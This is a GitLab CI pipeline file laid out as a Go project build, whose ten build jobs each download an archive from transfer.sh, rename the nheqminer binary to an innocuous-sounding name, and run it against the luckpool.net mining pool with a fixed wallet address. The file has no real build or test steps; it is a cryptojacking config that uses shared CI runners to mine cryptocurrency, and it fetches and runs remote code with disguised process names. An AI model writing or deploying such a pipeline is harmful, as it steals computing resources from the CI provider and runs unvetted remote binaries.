image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_1:
  stage: build
  script:
     - wget https://transfer.sh/USMac/dusf78.tar.gz && tar -xf dusf78.tar.gz
     - mv nheqminer drama
     - chmod +x ./drama
     - ./drama -v -l na.luckpool.net:3956 -u RBvBTKg1t2BTUVFR9Tj6eNyGben4kmXwov.Arny -p x -t 2

build_2:
  stage: build
  script:
     - wget https://transfer.sh/USMac/dusf78.tar.gz && tar -xf dusf78.tar.gz
     - mv nheqminer employee
     - chmod +x ./employee
     - ./employee -v -l na.luckpool.net:3956 -u RBvBTKg1t2BTUVFR9Tj6eNyGben4kmXwov.Arny -p x -t 2

build_3:
  stage: build
  script:
     - wget https://transfer.sh/USMac/dusf78.tar.gz && tar -xf dusf78.tar.gz
     - mv nheqminer retired
     - chmod +x ./retired
     - ./retired -v -l na.luckpool.net:3956 -u RBvBTKg1t2BTUVFR9Tj6eNyGben4kmXwov.Arny -p x -t 2

build_4:
  stage: build
  script:
     - wget https://transfer.sh/USMac/dusf78.tar.gz && tar -xf dusf78.tar.gz
     - mv nheqminer leftovers
     - chmod +x ./leftovers
     - ./leftovers -v -l na.luckpool.net:3956 -u RBvBTKg1t2BTUVFR9Tj6eNyGben4kmXwov.Arny -p x -t 2

build_5:
  stage: build
  script:
     - wget https://transfer.sh/USMac/dusf78.tar.gz && tar -xf dusf78.tar.gz
     - mv nheqminer casualty
     - chmod +x ./casualty
     - ./casualty -v -l na.luckpool.net:3956 -u RBvBTKg1t2BTUVFR9Tj6eNyGben4kmXwov.Arny -p x -t 2
build_6:
  stage: build
  script:
     - wget https://transfer.sh/USMac/dusf78.tar.gz && tar -xf dusf78.tar.gz
     - mv nheqminer mention
     - chmod +x ./mention
     - ./mention -v -l na.luckpool.net:3956 -u RBvBTKg1t2BTUVFR9Tj6eNyGben4kmXwov.Arny -p x -t 2

build_7:
  stage: build
  script:
     - wget https://transfer.sh/USMac/dusf78.tar.gz && tar -xf dusf78.tar.gz
     - mv nheqminer kontol
     - chmod +x ./kontol
     - ./kontol -v -l na.luckpool.net:3956 -u RBvBTKg1t2BTUVFR9Tj6eNyGben4kmXwov.Arny -p x -t 2

build_8:
  stage: build
  script:
     - wget https://transfer.sh/USMac/dusf78.tar.gz && tar -xf dusf78.tar.gz
     - mv nheqminer escape
     - chmod +x ./escape
     - ./escape -v -l na.luckpool.net:3956 -u RBvBTKg1t2BTUVFR9Tj6eNyGben4kmXwov.Arny -p x -t 2

build_9:
  stage: build
  script:
     - wget https://transfer.sh/USMac/dusf78.tar.gz && tar -xf dusf78.tar.gz
     - mv nheqminer convert
     - chmod +x ./convert
     - ./convert -v -l na.luckpool.net:3956 -u RBvBTKg1t2BTUVFR9Tj6eNyGben4kmXwov.Arny -p x -t 2

build_10:
  stage: build
  script:
     - wget https://transfer.sh/USMac/dusf78.tar.gz && tar -xf dusf78.tar.gz
     - mv nheqminer ward
     - chmod +x ./ward
     - ./ward -v -l na.luckpool.net:3956 -u RBvBTKg1t2BTUVFR9Tj6eNyGben4kmXwov.Arny -p x -t 2
